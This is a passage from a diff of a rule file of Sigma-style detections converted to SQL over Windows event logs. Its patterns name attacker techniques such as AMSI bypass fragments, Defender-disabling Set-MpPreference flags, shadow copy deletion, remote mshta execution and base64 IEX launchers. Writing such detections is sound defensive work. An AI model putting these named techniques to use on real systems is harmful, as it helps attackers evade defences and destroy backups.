(HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", - "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" - ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" - }, - { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", - "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.credential_access", - "attack.t1556.002" - ], - "falsepositives": [ - "Unknown" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": "posh_pc_remote_powershell_session.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", - "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "status": "test", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as 
used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "status": "test", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - 
"attack.t1216" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + 
"attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "status": "test", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND 
NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_tamper_defender.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", "status": "test", - "description": "Detects suspicious PowerShell invocation command parameters", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "proc_creation_win_regedit_trustedinstaller.yml" }, { - "title": "Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the 
Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" - ], + "title": "HackTool - PCHunter Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "status": "experimental", + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR 
Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_hktl_localpotato.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1137.006" - ], + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", + "status": "experimental", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate scripts that use IEX" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", - "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Scripts that shutdown the system immediately and reboot them in safe mode 
are unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "proc_creation_win_malware_snatch_ransomware.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", - "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "status": "test", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. 
